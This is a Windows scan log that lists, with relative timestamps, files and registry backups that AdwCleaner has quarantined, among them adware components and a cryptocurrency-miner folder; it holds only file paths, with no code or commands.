         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.3s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -1.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.8s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.8s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.8s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.8s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.7s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.6s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.6s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.4s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.4s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.4s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.4s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.4s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.4s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.4s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
         -0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
         -0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
         -0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
         -0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
         -0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
         -0.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.1s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.1s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.1s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.3s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.3s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.3s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.3s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.4s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.4s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.5s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.5s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.5s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.5s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.5s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.6s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.6s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.6s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.6s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.7s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.7s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.7s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.7s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.8s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          0.8s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          0.8s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          0.8s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          0.9s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          0.9s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.1s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.2s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.3s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.3s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
